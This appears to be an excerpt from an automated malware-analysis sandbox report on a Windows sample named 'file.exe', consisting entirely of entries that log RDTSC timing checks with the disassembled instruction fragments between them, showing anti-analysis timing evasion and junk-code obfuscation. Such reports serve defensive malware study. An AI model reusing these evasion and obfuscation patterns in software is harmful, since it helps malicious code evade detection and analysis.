              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450308 second address: 45030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45113D second address: 4511B0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5AF5006756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F5AF5006758h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 jmp 00007F5AF5006762h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F5AF5006758h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a mov bx, 839Bh 0x0000004e pop ebx 0x0000004f or edi, 51F10B28h 0x00000055 push eax 0x00000056 push ebx 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450445 second address: 45044B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4511B0 second address: 4511B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45044B second address: 450450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 453116 second address: 45311C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 454098 second address: 454126 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5AF4D0D7CAh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f jnp 00007F5AF4D0D7C9h 0x00000015 xor bh, FFFFFFF4h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F5AF4D0D7C8h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 call 00007F5AF4D0D7CEh 0x00000039 adc bh, FFFFFFDBh 0x0000003c pop edi 0x0000003d push 00000000h 0x0000003f sbb bx, 6AA6h 0x00000044 jmp 00007F5AF4D0D7D9h 0x00000049 xchg eax, esi 0x0000004a je 00007F5AF4D0D7D2h 0x00000050 ja 00007F5AF4D0D7CCh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b jo 00007F5AF4D0D7C6h 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 454126 second address: 45412A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45329F second address: 4532A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45412A second address: 454130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4532A4 second address: 4532C6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5AF4D0D7CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5AF4D0D7CFh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45338C second address: 453390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 453390 second address: 45339D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45339D second address: 4533A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4542A6 second address: 454351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2605h] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 jmp 00007F5AF4D0D7CBh 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F5AF4D0D7C8h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e mov edi, esi 0x00000040 mov eax, dword ptr [ebp+122D00B9h] 0x00000046 mov ebx, dword ptr [ebp+1245EF1Ah] 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007F5AF4D0D7C8h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 0000001Bh 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 pushad 0x00000069 or dword ptr [ebp+122D2857h], edi 0x0000006f adc edx, 68D632A6h 0x00000075 popad 0x00000076 xor di, 814Ah 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e js 00007F5AF4D0D7C8h 0x00000084 push ebx 0x00000085 pop ebx 0x00000086 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 454351 second address: 454358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45632F second address: 45639B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D1B3Fh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F5AF4D0D7C8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F5AF4D0D7C8h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 add edi, dword ptr [ebp+122D1BCBh] 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jno 00007F5AF4D0D7C8h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45639B second address: 4563A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45A7F1 second address: 45A7FA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45A7FA second address: 45A80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 js 00007F5AF5006768h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45A80D second address: 45A811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45A811 second address: 45A866 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5AF5006756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b xor edi, dword ptr [ebp+122D26FEh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F5AF5006758h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d push 00000000h 0x0000002f mov ebx, dword ptr [ebp+122D3680h] 0x00000035 pushad 0x00000036 add edx, dword ptr [ebp+122D2DEBh] 0x0000003c mov esi, eax 0x0000003e popad 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F5AF500675Dh 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B88C second address: 45B892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45AA57 second address: 45AA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4631A5 second address: 4631A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4631A9 second address: 4631C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF500675Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4631C2 second address: 4631CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4649DE second address: 4649E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46AC42 second address: 46AC49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46AC49 second address: 46AC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46A4DD second address: 46A4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnp 00007F5AF4D0D7C6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46A4E9 second address: 46A4F3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AF5006756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46A4F3 second address: 46A4FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F5AF4D0D7C6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46A6B7 second address: 46A6BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46A6BC second address: 46A6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5AF4D0D7C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F5AF4D0D7CDh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46A6D9 second address: 46A6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46EFCD second address: 46EFD7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5AF4D0D7C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4751F9 second address: 4751FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4751FF second address: 475219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b popad 0x0000000c jo 00007F5AF4D0D7E4h 0x00000012 jg 00007F5AF4D0D7CCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4754CB second address: 475522 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F5AF5006756h 0x0000000b pop edi 0x0000000c je 00007F5AF5006774h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F5AF500675Bh 0x0000001c jmp 00007F5AF5006762h 0x00000021 popad 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 pop edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4758ED second address: 4758F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4758F1 second address: 47590D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006768h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47590D second address: 475913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475913 second address: 475925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475925 second address: 475929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475929 second address: 47592D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47592D second address: 475933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DB74 second address: 47DB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D3AC second address: 47D3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D3B0 second address: 47D3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482812 second address: 482818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482818 second address: 48282F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5AF500675Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48282F second address: 482833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482833 second address: 48284A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006760h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44B708 second address: 44B70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44BD02 second address: 44BD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44BD06 second address: 44BD11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44C0AB second address: 44C0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44C0B1 second address: 44C0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F5AF4D0D7D9h 0x0000000f jmp 00007F5AF4D0D7CDh 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44C904 second address: 42ACE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5AF5006756h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push ebx 0x00000014 push esi 0x00000015 jmp 00007F5AF500675Dh 0x0000001a pop esi 0x0000001b pop ebx 0x0000001c nop 0x0000001d clc 0x0000001e call dword ptr [ebp+122D1BEDh] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jc 00007F5AF5006756h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42ACE6 second address: 42AD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5AF4D0D7C6h 0x0000000a popad 0x0000000b jmp 00007F5AF4D0D7D3h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482D75 second address: 482D7A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482D7A second address: 482D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482D83 second address: 482D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5AF5006756h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482F18 second address: 482F3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D3h 0x00000007 pushad 0x00000008 jmp 00007F5AF4D0D7CEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482F3E second address: 482F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830A4 second address: 4830AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4834E0 second address: 4834F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5AF5006756h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4834F1 second address: 4834F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4834F5 second address: 483501 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483501 second address: 483505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488F38 second address: 488F4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F5AF5006756h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4881EB second address: 4881F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4881F2 second address: 488210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF5006767h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488388 second address: 48839F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4884E9 second address: 4884EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4884EF second address: 4884FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F5AF4D0D7CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488650 second address: 48865A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5AF5006756h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488DDE second address: 488DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488DE4 second address: 488DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4030E7 second address: 4030EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ED7E second address: 48ED9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006769h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ED9D second address: 48EDA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EED0 second address: 48EEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF5006764h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EEED second address: 48EF2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F5AF4D0D7D2h 0x0000000f push eax 0x00000010 jnp 00007F5AF4D0D7C6h 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jnp 00007F5AF4D0D7C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EF2E second address: 48EF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FAA35 second address: 3FAA58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D3h 0x00000007 jg 00007F5AF4D0D7C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FAA58 second address: 3FAA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FAA5E second address: 3FAA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
